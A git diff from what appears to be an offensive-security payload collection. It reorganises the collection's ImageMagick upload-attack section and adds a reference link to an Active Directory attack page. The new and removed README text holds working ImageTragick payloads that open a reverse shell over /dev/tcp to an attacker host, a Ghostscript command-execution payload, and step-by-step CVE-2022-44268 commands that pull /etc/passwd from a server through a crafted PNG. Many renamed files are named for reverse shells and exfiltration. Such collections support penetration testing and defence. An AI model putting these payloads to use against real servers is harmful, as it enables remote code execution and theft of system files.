diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 662f63d..704e89e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -4430,4 +4430,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) -* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) \ No newline at end of file +* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/README.md b/Upload Insecure Files/Picture Image Magik/README.md deleted file mode 100644 index 98e51af..0000000 --- a/Upload Insecure Files/Picture Image Magik/README.md +++ /dev/null @@ -1,38 +0,0 @@ -# Image Tragik 1 & 2 - - -## Exploit v1 - -Simple reverse shell - -```powershell -push graphic-context -encoding "UTF-8" -viewbox 0 0 1 1 -affine 1 0 0 1 0 0 -push graphic-context -image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' -pop graphic-context -pop graphic-context -``` - -## Exploit v2 - -Simple `id` payload - -```powershell -%!PS -userdict /setpagedevice undef -save -legal -{ null restore } stopped { pop } if -{ legal } stopped { pop } if -restore -mark /OutputFile (%pipe%id) currentdevice putdeviceprops -``` - -then use `convert shellexec.jpeg whatever.gif` - -## Thanks to - -* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload Insecure Files/Picture ImageMagick/README.md b/Upload Insecure Files/Picture ImageMagick/README.md new file mode 100644 index 0000000..d55d97d --- /dev/null +++ b/Upload Insecure Files/Picture ImageMagick/README.md @@ -0,0 +1,52 @@ +# ImageMagick Exploits + +## ImageTragik Exploit v1 + +Simple reverse shell + +```powershell +push graphic-context +encoding "UTF-8" +viewbox 0 0 1 1 +affine 1 0 0 1 0 0 +push graphic-context +image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' +pop graphic-context +pop graphic-context +``` + +## ImageTragik Exploit v2 + +Simple `id` payload + +```powershell +%!PS +userdict /setpagedevice undef +save +legal +{ null restore } stopped { pop } if +{ legal } stopped { pop } if +restore +mark /OutputFile (%pipe%id) currentdevice putdeviceprops +``` + +then use `convert shellexec.jpeg whatever.gif` + + +## CVE-2022-44268 + +Information Disclosure: embedded the content of an arbitrary remote file + +* Generate the payload + ```ps1 + apt-get install pngcrush imagemagick exiftool exiv2 -y + pngcrush -text a "profile" "/etc/passwd" exploit.png + ``` +* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png` +* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png` +* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'` + + +## Thanks to + +* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg b/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg rename to Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg b/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg rename to Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg diff --git a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg b/Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg rename to Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg diff --git a/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png b/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png new file mode 100644 index 0000000..18c9ddf Binary files /dev/null and b/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png differ diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf b/Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf rename to Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg rename to Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 4813fb0..5488276 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -11,7 +11,7 @@ * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture compression](#picture-compression-) * [Configuration Files](#configuration-files) - * [CVE - Image Tragik](#cve---image-tragik) + * [CVE - ImageMagick](#cve---imagemagick) * [CVE - FFMpeg](#cve---ffmpeg) * [ZIP Archive](#zip-archive) * [Jetty RCE](#jetty-rce) @@ -161,18 +161,19 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t } ``` -### CVE - Image Tragik +### CVE - ImageMagick -Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1) +If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik. -```powershell -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' -pop graphic-context -``` +* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1) + ```powershell + push graphic-context + viewbox 0 0 640 480 + fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' + pop graphic-context + ``` -More payload in the folder `Picture Image Magik` +More payloads in the folder `Picture ImageMagick` ### CVE - FFMpeg